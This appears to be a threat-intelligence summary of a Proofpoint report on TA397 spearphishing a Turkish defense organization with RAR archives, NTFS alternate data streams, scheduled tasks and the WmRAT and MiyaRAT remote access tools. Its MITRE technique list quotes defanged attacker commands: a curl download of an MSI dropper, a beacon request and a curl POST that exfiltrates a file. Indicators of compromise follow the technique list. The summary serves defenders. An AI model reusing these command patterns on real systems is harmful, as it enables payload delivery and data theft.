Proofpoint observed TA397 spearphishing a Turkish defense-sector organization using RAR archives and NTFS alternate data streams to execute PowerShell and create a scheduled task that staged further payloads. The campaign manually delivered WmRAT and the newer MiyaRAT for intelligence collection and C2 communication. #TA397 #MiyaRAT
Keypoints
- TA397 sent a targeted spearphishing email with a RAR attachment containing a decoy PDF, a malicious LNK shortcut, and NTFS alternate data streams (ADS).
- The ADS named “Participation” contained base64 PowerShell which the LNK executed to open the PDF and create a scheduled task (“DsSvcCleanup”) that beaconed to a staging domain.
- Operators manually delivered two RAT families—WmRAT and MiyaRAT—via MSI droppers (anvrsa.msi, gfxview.msi) to enable remote access, enumeration, and exfiltration.
- Staging and C2 infrastructure included jacknwoods[.]com (staging) and academymusica[.]com / samsnewlooker[.]com (C2), with observed IPs 185.244.151[.]84, 38.180.142[.]228, and 96.9.215[.]155.
- Techniques (RAR archives, ADS, scheduled tasks, manual operator activity) and operational patterns (UTC+5:30 working hours) link the activity to TA397/Bitter and likely intelligence collection for a South Asian government.
- Proofpoint provides YARA/ET signatures and IOCs to help defenders detect and mitigate similar campaigns leveraging ADS and scheduled tasks for persistence.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – used to deliver a RAR with a decoy PDF and malicious shortcut (‘RAR archive containing a decoy PDF and a malicious LNK file’).
- [T1053.005] Scheduled Task/Job – attacker-created scheduled task named “DsSvcCleanup” to periodically fetch next-stage payloads (‘set up a scheduled task named “DsSvcCleanup”’).
- [T1059.001] PowerShell – ADS contained base64-encoded PowerShell which was executed to open the decoy PDF and create the scheduled task (‘base64 encoded PowerShell from “Participation”’).
- [T1564.001] Hidden Files and Directories (NTFS ADS) – NTFS alternate data streams were used to hide the PowerShell payload inside the PDF file stream (‘Alternate Data Stream (ADS) file that contained PowerShell code’).
- [T1105] Ingress Tool Transfer – curl was used by the scheduled task and operator responses to download MSI droppers and payloads (‘curl -o C:userspublicmusicgfxview[.]msi http://jacknwoods[.]com/gfxview[.]msi’).
- [T1071.001] Application Layer Protocol: Web Protocols – HTTP GET/POST over web endpoints used for beacons and exfiltration (‘GET http[:]//jacknwoods[.]com/jacds[.]php?jin=%computername%_%username%’ and POST to /chthuo[.]php’).
- [T1041] Exfiltration Over C2 Channel – attacker commands enumerated host data and exfiltrated it via HTTP POST to attacker-controlled endpoints (‘curl -X POST -F “file=[@]C:programdataabc[.]pdf” hxxps[:]//www[.]jacknwoods[.]com/chthuo[.]php’).
- [T1218] Signed Binary Proxy Execution – msiexec was used to install MSI droppers that deployed the RATs (‘msiexec /i C:userspublicmusicgfxview.msi /qn /norestart’).
Indicators of Compromise
- [SHA256] RAR / payload samples – 53a653aae9678075276bdb8ccf5eaff947f9121f73b8dcf24858c0447922d0b1, f6c77098906f5634789d7fd7ff294bfd95325d69f1be96be1ee49ff161e07733 (RAR and LNK samples; additional WmRAT/MiyaRAT hashes listed in report).
- [SHA256] Malware binaries – 10cec5a84943f9b0c635640fad93fd2a2469cc46aae5e43a4604c903d139970f (WmRAT), c7ab300df27ad41f8d9e52e2d732f95479f4212a3c3d62dbf0511b37b3e81317 (MiyaRAT).
- [Domain] Staging and C2 domains – jacknwoods[.]com (staging used to host MSI droppers), academymusica[.]com and samsnewlooker[.]com (C2 domains for WmRAT and MiyaRAT respectively).
- [IP] Observed IPs – 185.244.151[.]84 (jacknwoods[.]com staging), 38.180.142[.]228 (academymusica[.]com C2), 96.9.215[.]155 (samsnewlooker[.]com C2).
- [File names] Droppers / executables – anvrsa.msi (installs anvrsa.exe / WmRAT), gfxview.msi (drops xrgtg.exe / MiyaRAT); decoy files: ~tmp.pdf, PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk.
- [URLs/Paths] Beacon and exfil endpoints – /jacds.php?jin=… (initial beacon), /chthuo.php?ain=… (exfil POST) on jacknwoods[.]com.